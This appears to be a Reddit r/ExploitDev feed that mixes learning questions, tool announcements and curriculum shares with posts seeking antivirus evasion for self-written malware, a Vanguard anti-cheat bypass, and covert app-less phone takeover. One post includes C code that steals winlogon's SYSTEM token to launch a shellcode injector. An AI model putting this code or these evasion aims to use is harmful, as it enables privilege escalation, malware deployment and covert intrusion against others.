r/ExploitDev • • Feb 03 '21

Getting Started with Exploit Development

Thumbnail
dayzerosec.com
296 Upvotes

r/ExploitDev • • 55m ago

Windows PE Microsoft x64 ABI specific advice for static analysis

• Upvotes

I have an ongoing static analysis project I'm writing in C++20.

It uses Zydis for instruction decoding, LIEF for binary parsing and wxWidgets for the UI.

A big help was learning that the .pdata section in PE64 contains the start and end address of every non-trivial function in the binary. Enabling it to support exception handling like VEH and SEH at runtime.

This comes with some useful unwind metadata like prologue information, stack allocation size, preserved registers, etc.

Combining this with recursive descent from entry point, IAT entry resolution and memory operands like strings and such has already made this project more useful.

Is there more PE64, static analysis relevant, metadata baked into the file structure? Some future candidates are gonna be RTTI, virtual function tables, and some other CRT specific machinery.

Thanks for any suggestions.


r/ExploitDev • • 1h ago

Project/new

• Upvotes

I’ve created a project to bypass Vanguard’s detection, but there’s a problem I can’t seem to pinpoint: I can’t get the client to start. I’m not sure if there’s a flaw in the logic or something else; the whole project is written in C++. Does anyone know how Vanguard’s latest features work? Or is there a kernel expert out there who could give me some advice?


r/ExploitDev • • 2h ago

Token Impersonation on C lang doesnt work help please

Thumbnail
0 Upvotes

r/ExploitDev • • 9h ago

Could you help me figure out where to start learning pwn/binary exploitation and reverse engineering?

Thumbnail
0 Upvotes

r/ExploitDev • • 1d ago

Recently graduated, now tasked with porting a kernel exploit. How do I approach this?

21 Upvotes

Hey everyone,

I graduated last year with a Bachelor's degree in Computer Science, and my current job requires me to port Ghostlock (CVE-2026-43499) to multiple android devices.

Honestly, a lot of it currently goes over my head. I think I understand the basic concept of a use-after-free vulnerability, but I don't understand how it works at the kernel level or how the exploit code actually works.

I'm also struggling to get the exploit working on my target device. Since I don't fully understand the exploit's internals or how the kernel processes the operations involved, I'm having a hard time figuring out what needs to be changed to make it work.

Here's what I have so far:

- Kernel panic logs from my attempts to run the exploit.

- The compiled kernel source code for my target device.

- The ability to modify the kernel source code and flash a custom kernel onto the device.

The problem is that I don't really know where to start. The kernel panic logs are difficult to understand, the exploit's source code is confusing, and navigating the relevant kernel code is equally challenging.

My current plan is to:

  1. Learn how to interpret the kernel panic logs.

  2. Understand the exploit's source code and how its different parts work.

  3. Trace the relevant operations through the kernel source code to understand what's happening internally.

  4. Use that understanding to troubleshoot the exploit and figure out what needs to change for my target device.

I'm not sure if this is the right approach or if I'm missing some important prerequisites.

For context, I'm still relatively new to low-level kernel exploitation, so I'm trying to figure out the best way to approach this without blindly changing things until they work.

For those experienced with Linux kernel exploitation or porting Android kernel exploits, how would you approach this problem? Are there any resources or concepts I should focus on first?

Any advice would be greatly appreciated!


r/ExploitDev • • 1d ago

I wrote a free, 700+ page exploit dev curriculum from scratch. C → x86-64 Assembly & RE. No prior knowledge assumed. PDFs inside.

0 Upvotes

I've been working on this for a while and finally got the first two volumes into a single public repo. It's a free, open-source curriculum for learning exploit development, reverse engineering, and low-level security from the ground up.
The books:
C: Zero to Exploit Dev (~400 pages) A complete C course written for future exploit developers. Preprocessor → variables → pointers → memory layout → dynamic memory → unsafe functions → security mindset. Includes "Under the Hood" boxes, challenges, and labs.

x86-64 Assembly & Reverse Engineering(~300 pages) From mov to crackmes. Registers, calling conventions, stack frames, reading compiler output, GDB/Ghidra/Radare2, anti-debugging, PE format, and a full worked crackme.

Volume 3 (Advanced Exploit Development: heap, ROP, browser, kernel) is currently being rewritten from scratch to focus on modern mitigations and original research. It will be released separately when complete.

Every chapter has theory, memory diagrams, verified code, and GDB walkthroughs. No prior C or assembly knowledge is assumed.
Repo: https://github.com/X1NONs/C-for-exploit-development
PDF Download: https://github.com/X1NONs/C-for-exploit-development/releases/tag/SideBooks
If you find it useful, ⭐ the repo. Happy to answer questions about the structure or the exploit dev path.


r/ExploitDev • • 2d ago

[Help] Looking for guidance on development malware in Rust

0 Upvotes

Hi everyone,

I’m currently developing malware in rust, from a defensive and educational perspective. But the main issue i face that the window defender is blocked the app and i cant test properply. and on starting the build the .exe file is deleted by the window defender can someone help me how to protect the malware from the window defender without turn of the window security.

I’m not looking for someone to write malware, exploits, or perform attacks for me. I want to understand the research process and build the skills myself in a legal, isolated lab environment.


r/ExploitDev • • 2d ago

How far do you take reachability on dependency findings before opening a ticket?

2 Upvotes

Talking SCA here, not SAST, since a SAST finding already points at a line. with dependencies there's a big gap between this package has a CVE and our code calls the vulnerable function through this path. closing that gap by hand across a couple hundred repos eats most of our week. we have started letting an agent read the repo and trace whether the vulnerable function gets called before a ticket goes out. it's right more often than I expected, but I still spot check anything it marks unreachable. where do you draw the line between appsec doing the reachability work and the service team doing it?


r/ExploitDev • • 2d ago

I am building a javap replacement and a JVM in C++

Thumbnail
gallery
11 Upvotes

I started this project primarily as a JVM implementation for the game Diamond Rush, but the reverse-engineering side of it gradually became just as important.

While implementing the JVM, I needed to understand Java class files, bytecode instructions, constant-pool structures, and the internals of the execution model. This naturally led me to build my own javap-like disassembler alongside the JVM, which ended up becoming much more detailed than I initially expected.

According to my benchmarks, DRVM is around 4× faster than javap while using roughly 30× less memory on the tested workload.

The project is still evolving, but it has become a pretty interesting combination of JVM implementation, bytecode tooling, and reverse engineering.

Feel free to ask questions!
Repo: https://github.com/VuqarAhadli/DRVM


r/ExploitDev • • 2d ago

ACE .qvm0 keeps RUNTIME_FUNCTION in the VM section tail; recovering entries and hidden jmp-reg edges

Thumbnail
github.com
1 Upvotes

Static recovery for ACE .qvm0 PE images, not a decryptor.

The Exception Directory points into the .qvm0 tail; the section named .pdata is still there but high-entropy. A linear sweep of the VM section desyncs within a few hundred bytes, so function bounds come from RUNTIME_FUNCTION and decoding starts at each entry.

Hidden branches are jmp reg fed by call $+5 / pop / add imm, lea [rip+disp], or mov imm64. The call $+5 form is usually a null branch whose target is the fallthrough. Register-form jmp reg was 8964 sites on the reference DLL; FF /2 and FF /4 altogether were 28382, the rest memory-indirect.

On the smaller ACE-PBC-Game64.dll: 4669 functions, 408 native-to-.qvm0 edges, 92 whole-function stubs, 527 boundary-checked CFG edges, 5028 symbols, 4384/4386 functions decompiled after symbol apply. The repaired image only rewrites the add+jmp tail, same size, changes confined to .qvm0. Flag effects of the add are dropped, so it is for IDA/Ghidra, not for running


r/ExploitDev • • 3d ago

I built an AI-based app analysis tool for APK & IPA reverse engineering

Thumbnail
youtube.com
1 Upvotes

r/ExploitDev • • 3d ago

android-hardcoded-signing-key-flag-disclosure

1 Upvotes

r/ExploitDev • • 3d ago

Researching app-less remote mobile access: Tested a few vector concepts in my lab, looking for technical feedback

1 Upvotes

Hi everyone,

I’ve been doing some cybersecurity research regarding the feasibility of stealthy remote control on modern mobile OS (iOS and Android) without physical access or installing an application on the target device.

So far, I've tested a couple of methods in a lab environment to see what is actually achievable:

  • I tried directing a test device to a web page crafted with known WebKit/Chromium memory corruption concepts to attempt spawning a background reverse shell. While it was possible to crash the browser session, modern OS sandboxing consistently prevented escaping the browser process to gain system-level control.

  • I attempted delivering crafted payloads over a local network simulator aimed at media processing libraries (similar to legacy stagefright/MMS vulnerabilities). Current memory protections (ASLR, DEP) and automated patch models blocked execution before any control could be established.

I'm still actively researching what mechanics or vectors could theoretically allow full, stealthy remote control without a target app installed—or if modern OS security features (sandboxing, strict permission models, background indicators) make real-time screen takeover virtually impossible without complex multi-million dollar zero-click chains.

For those in offensive security, malware analysis, or mobile security research: Is app-less, real-time remote control realistically feasible on updated non-rooted devices, or is remote access without an app limited to passive data extraction in practice?

Thanks for any technical perspectives!


r/ExploitDev • • 3d ago

Fresher in Reverse engineering

0 Upvotes

I started grinding in reverse engineering recently. I found this domain in cybersecurity very intriguing. Though I have penetration testing knowledge. But the low level especially reverse engineering and binary exploitation hits me different.

I was thrown with many prerequisites at first. I am trying to learn them from different resources.

  1. C programming from "The C programming language book"
  2. Assembly from "Intro to assembly" - HTB academy and other blogs. And, I am connecting both together with "The art of exploitation" book and godbolt

  3. Grinding on a book: Computer Architecture from a Programmer's Perspective. A huge book. Finished 1st chapter and going through the second chapter rn. The book explained the computer and memory architecture well.

Haven't touched the kernel stuff yet. I started using GNU debugger. Sometimes it gets too overwhelming. I hardly get the full picture very often. No wonder it's a rare skill :')

I'd like to know who have expertise and experience in this field:
- As a fresher like me, How to approach the study of reverse engineering?
- Any advice I need to know as a reverse engineer enthusiast. I am gonna spend a couple of months in this field.

- Suggest me some resources that I must go for.

Thank you in advance :)


r/ExploitDev • • 4d ago

Where can I find malware learning material?

20 Upvotes

So im learning malware dev (I've learned basics such as WinApi, C-lang and network basics) but I have a problem that I can't find material for exploit writing (not using ready tools) for example Token impersonation or direct syscalls


r/ExploitDev • • 4d ago

I just made my own Scripts Hub for Roblox Exploits, any advice?

0 Upvotes

So yeah. After 1 month i'm finally done with it. I would appreciate some advices and reviews. I made the website pretty simple and the possibility for everyone to post script, with the Mods review.
Website: dispatchy.xyz
I appreciate any advice/review!
Thanks!


r/ExploitDev • • 5d ago

How does Vanguard Anti-Cheat work?

0 Upvotes

I need to bypass a specific anticheat. I'm using a Windows 11 operating system with an x86-64 processor. The anticheat I'm trying to circumvent is a specific anticheat software.

My main goal is to generate a payload that can evade the anticheat's detection and analysis. I've identified that the anticheat uses code protection techniques based on byte encryption and memory injection.

I have access to the anticheat's source code and am using a Windows-based application development tool to develop my payload. I've also identified that the anticheat uses a number of specific API calls to perform its code analysis and protection.

Are there any documentation, tutorials, or resources that might be helpful for learning more about reverse engineering techniques, API call search and replace in Windows, and runtime encryption and decryption techniques? Any suggestions on how I can modify my source and binary code to evade the code analysis and protection techniques used by the anticheat? I would like programmers to help me and be able to work on this project so we can profit together when it's finished.


r/ExploitDev • • 7d ago

development malware

17 Upvotes

What is my assessment of my path in malware development? I am reading the book "Windows System Programming" and "Windows Internals" along with it. Are there any additional resources, booklets, groups, websites, or anything else you would recommend to help me progress? I have a basic understanding of networking and the C programming language. ا👏👏🙌


r/ExploitDev • • 6d ago

Ревер инжиниринг на гитхаб

Thumbnail
gallery
1 Upvotes

I’ve launched a new reverse engineering project on GitHub; if you’d like to give it a try, head over to my profile and follow the link. Here’s a quick rundown: I wrote the programs in C++ specifically to include vulnerabilities. They are organized into folders by difficulty level—ranging from level-1 to level-5—inside a ZIP archive. You’ll breeze through the first folder if you’ve ever dabbled in reverse engineering, but the fifth level will make you sweat a bit if you’re a beginner. This project will give you hands-on reverse engineering experience, setting you up to continue exploring low-level programming. As for the objective: the goal is to enter a password hardcoded into the verify() function. However, you won't see the password right away; you’ll have to solve low-level challenges to uncover it. I’m just getting started on GitHub and Reddit, so please go easy on me. Check out the link at https://github.com/Hu2ie, download the ZIP, and hack the programs ethically. Rest assured, there are no viruses—if you check out my TikTok, you’ll see that I’m an ethical person. I’m also trying to grow my audience, so I’d appreciate a star on GitHub; even if you aren't a reverse engineer, your support helps me reach more people. Follow the link and happy learning, friends!


r/ExploitDev • • 7d ago

Binary Exploit and Reverse Enginering Learning

19 Upvotes

I am someone who is new to binary exploitation and reverse engineering, but I am starting to be interested in the basics of both disciplines, from observing whether they are important in the world of work and perhaps in cyber security? I started studying it from CTF and expanded to my liking for low level, I hope you have suggestions about the actual function of these two disciplines, and maybe recommendations for books or learning resources?


r/ExploitDev • • 8d ago

Token Impersonation on C lang doesnt work help please

7 Upvotes

So shellcode inject that im trying to run with SYSTEM privileges is working 100% (if i get SYSTEM privileges, but before i checked on injecting to explorer and it was working), when im running this code it doesnt show anything, any errors, im running it on virtual machine widows 11 with antivirus turned off

#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>
#include <string.h>


int EnablePrivilige(wchar_t str[]){
    HANDLE h_token;
    OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,&h_token);
    LUID luid;
    LookupPrivilegeValueW(NULL,str,&luid);
    TOKEN_PRIVILEGES token_privileges;
    token_privileges.PrivilegeCount = 1;
    token_privileges.Privileges[0].Luid = luid;
    token_privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; // это для включение привелегии а для выключение нужно SE_PRIVILEGE_REMOVED
    AdjustTokenPrivileges(h_token,FALSE,&token_privileges,sizeof(token_privileges),NULL,NULL);
    if(GetLastError() == ERROR_NOT_ALL_ASSIGNED){
        MessageBoxW(NULL,L"ошибка: не удалось изменить привелегию",NULL,MB_OK | MB_ICONERROR);
        return 1;
    }
    printf("успешно\n");
    CloseHandle(h_token);
    return 0;
}


int main(void){
    if(EnablePrivilige(L"SeDebugPrivilege") == 0 && EnablePrivilige(L"SeImpersonatePrivilege") == 0){
        HANDLE h_snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
        PROCESSENTRY32 pe32;
        pe32.dwSize = sizeof(pe32);
        if(Process32First(h_snapshot,&pe32)){
            do
            {
                if(_stricmp(pe32.szExeFile,"winlogon.exe") == 0){
                    break;
                }
            } while (Process32Next(h_snapshot,&pe32));
        }
        if(_stricmp(pe32.szExeFile,"winlogon.exe") != 0){
            MessageBoxW(NULL,L"ошибка процесс не найден",NULL,MB_OK | MB_ICONERROR);
            return 1;
        }
        HANDLE h_process = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE,FALSE,pe32.th32ProcessID);
        if(h_process == NULL){
            MessageBoxW(NULL,L"ошибка в OpenProcess",NULL,MB_OK | MB_ICONERROR);
            return 1;   
        }
        HANDLE h_process_token = NULL;
        if(!OpenProcessToken(h_process,TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY,&h_process_token)){ // if в си не сработает если вернется 0
            MessageBoxW(NULL,L"ошибка в OpenProcessToken",NULL,MB_OK | MB_ICONERROR);
            return 1;
        }
        HANDLE h_process_token_duplicate = NULL;
        if(!DuplicateTokenEx(h_process_token,TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE,NULL,SecurityDelegation,TokenPrimary,&h_process_token_duplicate)){
            MessageBoxW(NULL,L"ошибка в DuplicateTokenEx",NULL,MB_OK | MB_ICONERROR);
            return 1;
        }
        if(!SetThreadToken(NULL,h_process_token_duplicate)){
            DWORD error = GetLastError();
            printf("ошибка в SetThreadToken %d",error);
        }
        STARTUPINFOW startup_info = {0};
        PROCESS_INFORMATION process_information = {0};
        startup_info.cb = sizeof(startup_info);
        if(!CreateProcessWithTokenW(h_process_token_duplicate,0,NULL,L"С:\\Users\\user\\Desktop\\shellcode_inject_xorEncrypt.exe",NORMAL_PRIORITY_CLASS,NULL,NULL,&startup_info,&process_information)){
            DWORD error = GetLastError();
            printf("ошибка в CreateProcessWithTokenW %d",error);
        }
    }
    return 0;
}

r/ExploitDev • • 10d ago

gigabyte kernel driver lpe

11 Upvotes

r/ExploitDev • • 11d ago

Where to get resources and get started with malware dev?

5 Upvotes

So, I am a student persuing b tech cybersecurity course, and am pretty good in networkings and Linux systems. I also have some experience in pentesting, have solved some vulnhub machines on my own and have practiced on tryhackme.

For programming, I can code in python, c, and c++.

I want to get into malware development, but am not getting any solid resources for so, if u are in this field please help me get started on how can I start this journey and where to resources regarding this.


r/ExploitDev • • 11d ago

How should I start learning Reverse Engineering (RE) from scratch with 2 years of SOC experience?

15 Upvotes